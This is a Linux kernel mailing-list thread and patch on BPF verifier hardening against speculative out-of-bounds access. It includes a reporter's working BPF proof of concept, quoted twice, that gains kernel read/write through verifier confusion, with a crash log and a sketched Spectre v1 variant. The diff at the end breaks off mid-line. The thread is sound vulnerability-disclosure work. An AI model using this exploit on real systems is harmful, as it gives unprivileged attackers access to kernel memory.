Message ID | 20190102235835.3311-9-daniel@iogearbox.net |
---|---|
State | Accepted |
Delegated to: | BPF Maintainers |
Headers | show |
Series | bpf fix to prevent oob under speculation | expand |
Hi! Sorry about the extremely slow reply, I was on vacation over the holidays and only got back today. On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@iogearbox.net> wrote: > Jann reported that the original commit back in b2157399cc98 > ("bpf: prevent out-of-bounds speculation") was not sufficient > to stop CPU from speculating out of bounds memory access: > While b2157399cc98 only focussed on masking array map access > for unprivileged users for tail calls and data access such > that the user provided index gets sanitized from BPF program > and syscall side, there is still a more generic form affected > from BPF programs that applies to most maps that hold user > data in relation to dynamic map access when dealing with > unknown scalars or "slow" known scalars as access offset, for > example: [...] > +static int sanitize_ptr_alu(struct bpf_verifier_env *env, > + struct bpf_insn *insn, > + const struct bpf_reg_state *ptr_reg, > + struct bpf_reg_state *dst_reg, > + bool off_is_neg) > +{ [...] > + > + /* If we arrived here from different branches with different > + * limits to sanitize, then this won't work. > + */ > + if (aux->alu_state && > + (aux->alu_state != alu_state || > + aux->alu_limit != alu_limit)) > + return -EACCES; This code path doesn't get triggered in the case where the same ALU_ADD64 instruction is used for both "ptr += reg" and "numeric_reg += reg". This leads to kernel read/write because the code intended to ensure safety of the "ptr += reg" case in speculative execution ends up clobbering the addend in the "numeric_reg += reg" case: source code: ============= int main(void) { int my_map = array_create(8, 30); array_set(my_map, 0, 1); struct bpf_insn insns[] = { // load map value pointer into r0 and r2 BPF_LD_MAP_FD(BPF_REG_ARG1, my_map), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -16), BPF_ST_MEM(BPF_DW, BPF_REG_FP, -16, 0), BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), // load some number from the map into r1 BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_0, 0), // depending on R1, branch: BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 3), // branch A BPF_MOV64_REG(BPF_REG_2, BPF_REG_0), BPF_MOV64_IMM(BPF_REG_3, 0), BPF_JMP_A(2), // branch B BPF_MOV64_IMM(BPF_REG_2, 0), BPF_MOV64_IMM(BPF_REG_3, 0x100000), // *** COMMON INSTRUCTION *** BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_3), // depending on R1, branch: BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1), // branch A BPF_JMP_A(4), // branch B BPF_MOV64_IMM(BPF_REG_0, 0x13371337), // verifier-confused branch: verifier follows fall-through, runtime follows jump BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0x100000, 2), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), // fake-dead code; targeted from branch A to prevent dead code sanitization BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_0, 0), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN() }; int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns)); trigger_proc(sock_fd); } ============= verifier output: ============= 0: (18) r1 = 0x0 2: (bf) r2 = r10 3: (07) r2 += -16 4: (7a) *(u64 *)(r10 -16) = 0 5: (85) call bpf_map_lookup_elem#1 6: (55) if r0 != 0x0 goto pc+1 R0=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm 7: (95) exit from 6 to 8: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm 8: (71) r1 = *(u8 *)(r0 +0) R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm 9: (55) if r1 != 0x0 goto pc+3 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm 10: (bf) r2 = r0 11: (b7) r3 = 0 12: (05) goto pc+2 15: (0f) r2 += r3 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3_w=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm 16: (55) if r1 != 0x0 goto pc+1 17: (05) goto pc+4 22: (71) r0 = *(u8 *)(r0 +0) R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm 23: (b7) r0 = 0 24: (95) exit from 15 to 16 (speculative execution): safe from 9 to 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R10=fp0,call_-1 fp-16=mmmmmmmm 13: (b7) r2 = 0 14: (b7) r3 = 1048576 15: (0f) r2 += r3 16: (55) if r1 != 0x0 goto pc+1 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=inv1048576 R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm 17: (05) goto pc+4 22: safe from 16 to 18: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R2=inv1048576 R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm 18: (b7) r0 = 322376503 19: (55) if r2 != 0x100000 goto pc+2 20: (b7) r0 = 0 21: (95) exit processed 29 insns (limit 131072), stack depth 16 ============= dmesg: ============= [ 9948.417809] flen=38 proglen=205 pass=5 image=0000000039846164 from=test pid=2185 [ 9948.421291] JIT code: 00000000: 55 48 89 e5 48 81 ec 38 00 00 00 48 83 ed 28 48 [ 9948.424560] JIT code: 00000010: 89 5d 00 4c 89 6d 08 4c 89 75 10 4c 89 7d 18 31 [ 9948.428734] JIT code: 00000020: c0 48 89 45 20 48 bf 88 43 c3 da 81 88 ff ff 48 [ 9948.433479] JIT code: 00000030: 89 ee 48 83 c6 f0 48 c7 45 f0 00 00 00 00 48 81 [ 9948.437504] JIT code: 00000040: c7 d0 00 00 00 8b 46 00 48 83 f8 1e 73 0c 83 e0 [ 9948.443528] JIT code: 00000050: 1f 48 c1 e0 03 48 01 f8 eb 02 31 c0 48 83 f8 00 [ 9948.447364] JIT code: 00000060: 75 16 48 8b 5d 00 4c 8b 6d 08 4c 8b 75 10 4c 8b [ 9948.451079] JIT code: 00000070: 7d 18 48 83 c5 28 c9 c3 48 0f b6 78 00 48 83 ff [ 9948.454900] JIT code: 00000080: 00 75 07 48 89 c6 31 d2 eb 07 31 f6 ba 00 00 10 [ 9948.459435] JIT code: 00000090: 00 41 ba 07 00 00 00 49 29 d2 49 09 d2 49 f7 da [ 9948.466041] JIT code: 000000a0: 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83 ff 00 75 02 [ 9948.470384] JIT code: 000000b0: eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 [ 9948.474085] JIT code: 000000c0: 31 c0 eb 9e 48 0f b6 40 00 31 c0 eb 95 [ 9948.478102] BUG: unable to handle kernel paging request at 0000000013371337 [ 9948.481562] #PF error: [normal kernel read fault] [ 9948.483878] PGD 0 P4D 0 [ 9948.485139] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN [ 9948.487945] CPU: 5 PID: 2185 Comm: test Not tainted 4.20.0+ #225 [ 9948.490864] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [ 9948.494912] RIP: 0010:0xffffffffc01602f3 [ 9948.497212] Code: 49 09 d2 49 f7 da 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83 ff 00 75 02 eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 31 c0 eb 9e <48> 0f b6 40 00 31 c0 eb 95 cc cc cc cc cc cc cc cc cc cc cc cc cc [ 9948.506340] RSP: 0018:ffff8881e473f968 EFLAGS: 00010287 [ 9948.508857] RAX: 0000000013371337 RBX: ffff8881e8f01e40 RCX: ffffffff9388f848 [ 9948.512263] RDX: 0000000000100000 RSI: 0000000000000000 RDI: 0000000000000001 [ 9948.515653] RBP: ffff8881e473f978 R08: ffffed103b747002 R09: ffffed103b747002 [ 9948.519056] R10: 0000000000000000 R11: ffffed103b747001 R12: 0000000000000000 [ 9948.522452] R13: 0000000000000001 R14: ffff8881e2718600 R15: ffffc90001572000 [ 9948.525840] FS: 00007f2ad28ad700(0000) GS:ffff8881eb140000(0000) knlGS:0000000000000000 [ 9948.529708] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 9948.532450] CR2: 0000000013371337 CR3: 00000001e76c5004 CR4: 00000000003606e0 [ 9948.535834] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 9948.539217] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 9948.542581] Call Trace: [ 9948.543760] ? sk_filter_trim_cap+0x148/0x2d0 [ 9948.545847] ? sk_reuseport_is_valid_access+0xa0/0xa0 [ 9948.548249] ? skb_copy_datagram_from_iter+0x6e/0x280 [ 9948.550655] ? _raw_spin_unlock+0x16/0x30 [ 9948.552581] ? deactivate_slab.isra.68+0x59d/0x600 [ 9948.554866] ? unix_scm_to_skb+0xd1/0x230 [ 9948.556780] ? unix_dgram_sendmsg+0x312/0x940 [ 9948.558856] ? unix_stream_connect+0x980/0x980 [ 9948.560986] ? aa_sk_perm+0x10c/0x3f0 [ 9948.563123] ? kasan_unpoison_shadow+0x35/0x40 [ 9948.565107] ? aa_af_perm+0x1e0/0x1e0 [ 9948.566608] ? kasan_unpoison_shadow+0x35/0x40 [ 9948.568463] ? unix_stream_connect+0x980/0x980 [ 9948.570397] ? sock_sendmsg+0x6d/0x80 [ 9948.571948] ? sock_write_iter+0x121/0x1c0 [ 9948.573678] ? sock_sendmsg+0x80/0x80 [ 9948.575258] ? sock_enable_timestamp+0x60/0x60 [ 9948.576958] ? iov_iter_init+0x86/0xc0 [ 9948.578395] ? __vfs_write+0x294/0x3b0 [ 9948.579782] ? kernel_read+0xa0/0xa0 [ 9948.581152] ? apparmor_task_setrlimit+0x330/0x330 [ 9948.582919] ? vfs_write+0xe7/0x230 [ 9948.584228] ? ksys_write+0xa1/0x120 [ 9948.585559] ? __ia32_sys_read+0x50/0x50 [ 9948.587174] ? do_syscall_64+0x73/0x160 [ 9948.588872] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 9948.591134] Modules linked in: btrfs xor zstd_compress raid6_pq [ 9948.593654] CR2: 0000000013371337 [ 9948.595078] ---[ end trace cea5ab7027131bf2 ]--- ============= Aside from that, I also think that the pruning of "dead code" probably still permits v1 speculative execution attacks when code vaguely like the following is encountered, if it is possible to convince the CPU to mispredict the second branch, but I haven't tested that so far: R0 = <slow map value, known to be 0>; R1 = <fast map value>; if (R1 != R0) { // mispredicted return 0; } R3 = <a map value pointer>; R2 = <arbitrary 64-bit number>; if (R1 == 0) { // architecturally always taken, verifier prunes other branch R2 = <a map value pointer>; } access R3[R2[0] & 1]; To convince the CPU to predict the second branch the way you want, you could probably add another code path that jumps in front of the branch with both R2 and R3 already containing valid pointers. Something like this: if (<some map value>) { R0 = <slow map value, known to be 0>; R1 = <fast map value>; if (R1 != R0) { // mispredicted return 0; } R3 = <a map value pointer>; R2 = <arbitrary 64-bit number>;} else { R3 = <a map value pointer>; R2 = <arbitrary 64-bit number>; R1 = 1;} if (R1 == 0) { // architecturally always taken, verifier prunes other branch R2 = <a map value pointer>; } access R3[R2[0] & 1];
Hi Jann, On 01/03/2019 10:13 PM, Jann Horn wrote: > Hi! > > Sorry about the extremely slow reply, I was on vacation over the > holidays and only got back today. > > On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@iogearbox.net> wrote: >> Jann reported that the original commit back in b2157399cc98 >> ("bpf: prevent out-of-bounds speculation") was not sufficient >> to stop CPU from speculating out of bounds memory access: >> While b2157399cc98 only focussed on masking array map access >> for unprivileged users for tail calls and data access such >> that the user provided index gets sanitized from BPF program >> and syscall side, there is still a more generic form affected >> from BPF programs that applies to most maps that hold user >> data in relation to dynamic map access when dealing with >> unknown scalars or "slow" known scalars as access offset, for >> example: > [...] >> +static int sanitize_ptr_alu(struct bpf_verifier_env *env, >> + struct bpf_insn *insn, >> + const struct bpf_reg_state *ptr_reg, >> + struct bpf_reg_state *dst_reg, >> + bool off_is_neg) >> +{ > [...] >> + >> + /* If we arrived here from different branches with different >> + * limits to sanitize, then this won't work. >> + */ >> + if (aux->alu_state && >> + (aux->alu_state != alu_state || >> + aux->alu_limit != alu_limit)) >> + return -EACCES; > > This code path doesn't get triggered in the case where the same > ALU_ADD64 instruction is used for both "ptr += reg" and "numeric_reg > += reg". This leads to kernel read/write because the code intended to > ensure safety of the "ptr += reg" case in speculative execution ends > up clobbering the addend in the "numeric_reg += reg" case: > > source code: > ============= > int main(void) { > int my_map = array_create(8, 30); > array_set(my_map, 0, 1); > struct bpf_insn insns[] = { > // load map value pointer into r0 and r2 > BPF_LD_MAP_FD(BPF_REG_ARG1, my_map), > BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), > BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -16), > BPF_ST_MEM(BPF_DW, BPF_REG_FP, -16, 0), > BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), > BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), > BPF_EXIT_INSN(), > > // load some number from the map into r1 > BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_0, 0), > > // depending on R1, branch: > BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 3), > > // branch A > BPF_MOV64_REG(BPF_REG_2, BPF_REG_0), > BPF_MOV64_IMM(BPF_REG_3, 0), > BPF_JMP_A(2), > > // branch B > BPF_MOV64_IMM(BPF_REG_2, 0), > BPF_MOV64_IMM(BPF_REG_3, 0x100000), > > // *** COMMON INSTRUCTION *** > BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_3), > > // depending on R1, branch: > BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1), > > // branch A > BPF_JMP_A(4), > > // branch B > BPF_MOV64_IMM(BPF_REG_0, 0x13371337), > // verifier-confused branch: verifier follows fall-through, > runtime follows jump > BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0x100000, 2), > BPF_MOV64_IMM(BPF_REG_0, 0), > BPF_EXIT_INSN(), > > // fake-dead code; targeted from branch A to prevent dead code sanitization > BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_0, 0), > BPF_MOV64_IMM(BPF_REG_0, 0), > BPF_EXIT_INSN() > }; > int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns)); > trigger_proc(sock_fd); > } > ============= > > verifier output: > ============= > 0: (18) r1 = 0x0 > 2: (bf) r2 = r10 > 3: (07) r2 += -16 > 4: (7a) *(u64 *)(r10 -16) = 0 > 5: (85) call bpf_map_lookup_elem#1 > 6: (55) if r0 != 0x0 goto pc+1 > R0=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm > 7: (95) exit > > from 6 to 8: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 > fp-16=mmmmmmmm > 8: (71) r1 = *(u8 *)(r0 +0) > R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm > 9: (55) if r1 != 0x0 goto pc+3 > R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm > 10: (bf) r2 = r0 > 11: (b7) r3 = 0 > 12: (05) goto pc+2 > 15: (0f) r2 += r3 > R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 > R2_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3_w=inv0 R10=fp0,call_-1 > fp-16=mmmmmmmm > 16: (55) if r1 != 0x0 goto pc+1 > 17: (05) goto pc+4 > 22: (71) r0 = *(u8 *)(r0 +0) > R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 > R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3=inv0 R10=fp0,call_-1 > fp-16=mmmmmmmm > 23: (b7) r0 = 0 > 24: (95) exit > > from 15 to 16 (speculative execution): safe > > from 9 to 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) > R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R10=fp0,call_-1 > fp-16=mmmmmmmm > 13: (b7) r2 = 0 > 14: (b7) r3 = 1048576 > 15: (0f) r2 += r3 > 16: (55) if r1 != 0x0 goto pc+1 > R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=inv1048576 > R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm > 17: (05) goto pc+4 > 22: safe > > from 16 to 18: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) > R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R2=inv1048576 > R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm > 18: (b7) r0 = 322376503 > 19: (55) if r2 != 0x100000 goto pc+2 > 20: (b7) r0 = 0 > 21: (95) exit > processed 29 insns (limit 131072), stack depth 16 > ============= > > dmesg: > ============= > [ 9948.417809] flen=38 proglen=205 pass=5 image=0000000039846164 > from=test pid=2185 > [ 9948.421291] JIT code: 00000000: 55 48 89 e5 48 81 ec 38 00 00 00 48 > 83 ed 28 48 > [ 9948.424560] JIT code: 00000010: 89 5d 00 4c 89 6d 08 4c 89 75 10 4c > 89 7d 18 31 > [ 9948.428734] JIT code: 00000020: c0 48 89 45 20 48 bf 88 43 c3 da 81 > 88 ff ff 48 > [ 9948.433479] JIT code: 00000030: 89 ee 48 83 c6 f0 48 c7 45 f0 00 00 > 00 00 48 81 > [ 9948.437504] JIT code: 00000040: c7 d0 00 00 00 8b 46 00 48 83 f8 1e > 73 0c 83 e0 > [ 9948.443528] JIT code: 00000050: 1f 48 c1 e0 03 48 01 f8 eb 02 31 c0 > 48 83 f8 00 > [ 9948.447364] JIT code: 00000060: 75 16 48 8b 5d 00 4c 8b 6d 08 4c 8b > 75 10 4c 8b > [ 9948.451079] JIT code: 00000070: 7d 18 48 83 c5 28 c9 c3 48 0f b6 78 > 00 48 83 ff > [ 9948.454900] JIT code: 00000080: 00 75 07 48 89 c6 31 d2 eb 07 31 f6 > ba 00 00 10 > [ 9948.459435] JIT code: 00000090: 00 41 ba 07 00 00 00 49 29 d2 49 09 > d2 49 f7 da > [ 9948.466041] JIT code: 000000a0: 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83 > ff 00 75 02 > [ 9948.470384] JIT code: 000000b0: eb 12 b8 37 13 37 13 48 81 fe 00 00 > 10 00 75 04 > [ 9948.474085] JIT code: 000000c0: 31 c0 eb 9e 48 0f b6 40 00 31 c0 eb 95 > [ 9948.478102] BUG: unable to handle kernel paging request at 0000000013371337 > [ 9948.481562] #PF error: [normal kernel read fault] > [ 9948.483878] PGD 0 P4D 0 > [ 9948.485139] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN > [ 9948.487945] CPU: 5 PID: 2185 Comm: test Not tainted 4.20.0+ #225 > [ 9948.490864] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), > BIOS 1.10.2-1 04/01/2014 > [ 9948.494912] RIP: 0010:0xffffffffc01602f3 > [ 9948.497212] Code: 49 09 d2 49 f7 da 49 c1 fa 3f 49 21 d2 4c 01 d6 > 48 83 ff 00 75 02 eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 31 > c0 eb 9e <48> 0f b6 40 00 31 c0 eb 95 cc cc cc cc cc cc cc cc cc cc cc > cc cc > [ 9948.506340] RSP: 0018:ffff8881e473f968 EFLAGS: 00010287 > [ 9948.508857] RAX: 0000000013371337 RBX: ffff8881e8f01e40 RCX: ffffffff9388f848 > [ 9948.512263] RDX: 0000000000100000 RSI: 0000000000000000 RDI: 0000000000000001 > [ 9948.515653] RBP: ffff8881e473f978 R08: ffffed103b747002 R09: ffffed103b747002 > [ 9948.519056] R10: 0000000000000000 R11: ffffed103b747001 R12: 0000000000000000 > [ 9948.522452] R13: 0000000000000001 R14: ffff8881e2718600 R15: ffffc90001572000 > [ 9948.525840] FS: 00007f2ad28ad700(0000) GS:ffff8881eb140000(0000) > knlGS:0000000000000000 > [ 9948.529708] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 > [ 9948.532450] CR2: 0000000013371337 CR3: 00000001e76c5004 CR4: 00000000003606e0 > [ 9948.535834] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 > [ 9948.539217] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 > [ 9948.542581] Call Trace: > [ 9948.543760] ? sk_filter_trim_cap+0x148/0x2d0 > [ 9948.545847] ? sk_reuseport_is_valid_access+0xa0/0xa0 > [ 9948.548249] ? skb_copy_datagram_from_iter+0x6e/0x280 > [ 9948.550655] ? _raw_spin_unlock+0x16/0x30 > [ 9948.552581] ? deactivate_slab.isra.68+0x59d/0x600 > [ 9948.554866] ? unix_scm_to_skb+0xd1/0x230 > [ 9948.556780] ? unix_dgram_sendmsg+0x312/0x940 > [ 9948.558856] ? unix_stream_connect+0x980/0x980 > [ 9948.560986] ? aa_sk_perm+0x10c/0x3f0 > [ 9948.563123] ? kasan_unpoison_shadow+0x35/0x40 > [ 9948.565107] ? aa_af_perm+0x1e0/0x1e0 > [ 9948.566608] ? kasan_unpoison_shadow+0x35/0x40 > [ 9948.568463] ? unix_stream_connect+0x980/0x980 > [ 9948.570397] ? sock_sendmsg+0x6d/0x80 > [ 9948.571948] ? sock_write_iter+0x121/0x1c0 > [ 9948.573678] ? sock_sendmsg+0x80/0x80 > [ 9948.575258] ? sock_enable_timestamp+0x60/0x60 > [ 9948.576958] ? iov_iter_init+0x86/0xc0 > [ 9948.578395] ? __vfs_write+0x294/0x3b0 > [ 9948.579782] ? kernel_read+0xa0/0xa0 > [ 9948.581152] ? apparmor_task_setrlimit+0x330/0x330 > [ 9948.582919] ? vfs_write+0xe7/0x230 > [ 9948.584228] ? ksys_write+0xa1/0x120 > [ 9948.585559] ? __ia32_sys_read+0x50/0x50 > [ 9948.587174] ? do_syscall_64+0x73/0x160 > [ 9948.588872] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 > [ 9948.591134] Modules linked in: btrfs xor zstd_compress raid6_pq > [ 9948.593654] CR2: 0000000013371337 > [ 9948.595078] ---[ end trace cea5ab7027131bf2 ]--- > ============= Good point, thanks for catching this scenario! I'll get this fixed in order to reject such programs. > Aside from that, I also think that the pruning of "dead code" probably > still permits v1 speculative execution attacks when code vaguely like > the following is encountered, if it is possible to convince the CPU to > mispredict the second branch, but I haven't tested that so far: > > R0 = <slow map value, known to be 0>; > R1 = <fast map value>; > if (R1 != R0) { // mispredicted > return 0; > } > R3 = <a map value pointer>; > R2 = <arbitrary 64-bit number>; > if (R1 == 0) { // architecturally always taken, verifier prunes other branch > R2 = <a map value pointer>; > } > access R3[R2[0] & 1]; > > To convince the CPU to predict the second branch the way you want, you > could probably add another code path that jumps in front of the branch > with both R2 and R3 already containing valid pointers. Something like > this: > > if (<some map value>) { > R0 = <slow map value, known to be 0>; > R1 = <fast map value>; > if (R1 != R0) { // mispredicted > return 0; > } > R3 = <a map value pointer>; > R2 = <arbitrary 64-bit number>;} else { R3 = <a map value pointer>; > R2 = <arbitrary 64-bit number>; R1 = 1;} > if (R1 == 0) { // architecturally always taken, verifier prunes other branch > R2 = <a map value pointer>; > } > access R3[R2[0] & 1]; Thanks, I'll look into evaluating this case as well after the fix. Best, Daniel
diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h index 3f84f3e..27b7494 100644 --- a/include/linux/bpf_verifier.h +++ b/include/linux/bpf_verifier.h @@ -148,6 +148,7 @@ struct bpf_verifier_state { /* call stack tracking */ struct bpf_func_state *frame[MAX_CALL_FRAMES]; u32 curframe; + bool speculative; }; #define bpf_get_spilled_reg(slot, frame) \ @@ -167,15 +168,24 @@ struct bpf_verifier_state_list { struct bpf_verifier_state_list *next; }; +/* Possible states for alu_state member. */ +#define BPF_ALU_SANITIZE_SRC 1U +#define BPF_ALU_SANITIZE_DST 2U +#define BPF_ALU_NEG_VALUE (1U << 2) +#define BPF_ALU_SANITIZE (BPF_ALU_SANITIZE_SRC | \ + BPF_ALU_SANITIZE_DST) + struct bpf_insn_aux_data { union { enum bpf_reg_type ptr_type; /* pointer type for load/store insns */ unsigned long map_state; /* pointer/poison value for maps */ s32 call_imm; /* saved imm field of call insn */ + u32 alu_limit; /* limit for add/sub register with pointer */ }; int ctx_field_size; /* the ctx field size for load insn, maybe 0 */ int sanitize_stack_off; /* stack slot to be cleared */ bool seen; /* this insn was processed by the verifier */ + u8 alu_state; /* used in combination with alu_limit */ }; #define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */ diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c index 8e5da1c..f6bc62a 100644 --- a/kernel/bpf/verifier.c +++ b/kernel/bpf/verifier.c @@ -710,6 +710,7 @@ static int copy_verifier_state(struct bpf_verifier_state *dst_state, free_func_state(dst_state->frame[i]); dst_state->frame[i] = NULL; } + dst_state->speculative = src->speculative; dst_state->curframe = src->curframe; for (i = 0; i <= src->curframe; i++) { dst = dst_state->frame[i]; @@ -754,7 +755,8 @@ static int pop_stack(struct bpf_verifier_env *env, int *prev_insn_idx, } static struct bpf_verifier_state *push_stack(struct bpf_verifier_env *env, - int insn_idx, int prev_insn_idx) + int insn_idx, int prev_insn_idx, + bool speculative) { struct bpf_verifier_state *cur = env->cur_state; struct bpf_verifier_stack_elem *elem; @@ -772,6 +774,7 @@ static struct bpf_verifier_state *push_stack(struct bpf_verifier_env *env, err = copy_verifier_state(&elem->st, cur); if (err) goto err; + elem->st.speculative |= speculative; if (env->stack_size > BPF_COMPLEXITY_LIMIT_STACK) { verbose(env, "BPF program is too complex\n"); goto err; @@ -3067,6 +3070,102 @@ static bool check_reg_sane_offset(struct bpf_verifier_env *env, return true; } +static struct bpf_insn_aux_data *cur_aux(struct bpf_verifier_env *env) +{ + return &env->insn_aux_data[env->insn_idx]; +} + +static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg, + u32 *ptr_limit, u8 opcode, bool off_is_neg) +{ + bool mask_to_left = (opcode == BPF_ADD && off_is_neg) || + (opcode == BPF_SUB && !off_is_neg); + u32 off; + + switch (ptr_reg->type) { + case PTR_TO_STACK: + off = ptr_reg->off + ptr_reg->var_off.value; + if (mask_to_left) + *ptr_limit = MAX_BPF_STACK + off; + else + *ptr_limit = -off; + return 0; + case PTR_TO_MAP_VALUE: + if (mask_to_left) { + *ptr_limit = ptr_reg->umax_value + ptr_reg->off; + } else { + off = ptr_reg->smin_value + ptr_reg->off; + *ptr_limit = ptr_reg->map_ptr->value_size - off; + } + return 0; + default: + return -EINVAL; + } +} + +static int sanitize_ptr_alu(struct bpf_verifier_env *env, + struct bpf_insn *insn, + const struct bpf_reg_state *ptr_reg, + struct bpf_reg_state *dst_reg, + bool off_is_neg) +{ + struct bpf_verifier_state *vstate = env->cur_state; + struct bpf_insn_aux_data *aux = cur_aux(env); + bool ptr_is_dst_reg = ptr_reg == dst_reg; + u8 opcode = BPF_OP(insn->code); + u32 alu_state, alu_limit; + struct bpf_reg_state tmp; + bool ret; + + if (env->allow_ptr_leaks || BPF_SRC(insn->code) == BPF_K) + return 0; + + /* We already marked aux for masking from non-speculative + * paths, thus we got here in the first place. We only care + * to explore bad access from here. + */ + if (vstate->speculative) + goto do_sim; + + alu_state = off_is_neg ? BPF_ALU_NEG_VALUE : 0; + alu_state |= ptr_is_dst_reg ? + BPF_ALU_SANITIZE_SRC : BPF_ALU_SANITIZE_DST; + + if (retrieve_ptr_limit(ptr_reg, &alu_limit, opcode, off_is_neg)) + return 0; + + /* If we arrived here from different branches with different + * limits to sanitize, then this won't work. + */ + if (aux->alu_state && + (aux->alu_state != alu_state || + aux->alu_limit != alu_limit)) + return -EACCES; + + /* Corresponding fixup done in fixup_bpf_calls(). */ + aux->alu_state = alu_state; + aux->alu_limit = alu_limit; + +do_sim: + /* Simulate and find potential out-of-bounds access under + * speculative execution from truncation as a result of + * masking when off was not within expected range. If off + * sits in dst, then we temporarily need to move ptr there + * to simulate dst (== 0) +/-= ptr. Needed, for example, + * for cases where we use K-based arithmetic in one direction + * and truncated reg-based in the other in order to explore + * bad access. + */ + if (!ptr_is_dst_reg) { + tmp = *dst_reg; + *dst_reg = *ptr_reg; + } + ret = push_stack(env, env->insn_idx + 1, env->insn_idx, true); + if (!ptr_is_dst_reg) + *dst_reg = tmp; + return !ret ? -EFAULT : 0; +} + /* Handles arithmetic on a pointer and a scalar: computes new min/max and var_off. * Caller should also handle BPF_MOV case separately. * If we return -EACCES, caller may want to try again treating pointer as a @@ -3087,6 +3186,7 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env, umin_ptr = ptr_reg->umin_value, umax_ptr = ptr_reg->umax_value; u32 dst = insn->dst_reg, src = insn->src_reg; u8 opcode = BPF_OP(insn->code); + int ret; dst_reg = ®s[dst]; @@ -3142,6 +3242,11 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env, switch (opcode) { case BPF_ADD: + ret = sanitize_ptr_alu(env, insn, ptr_reg, dst_reg, smin_val < 0); + if (ret < 0) { + verbose(env, "R%d tried to add from different maps or paths\n", dst); + return ret; + } /* We can take a fixed 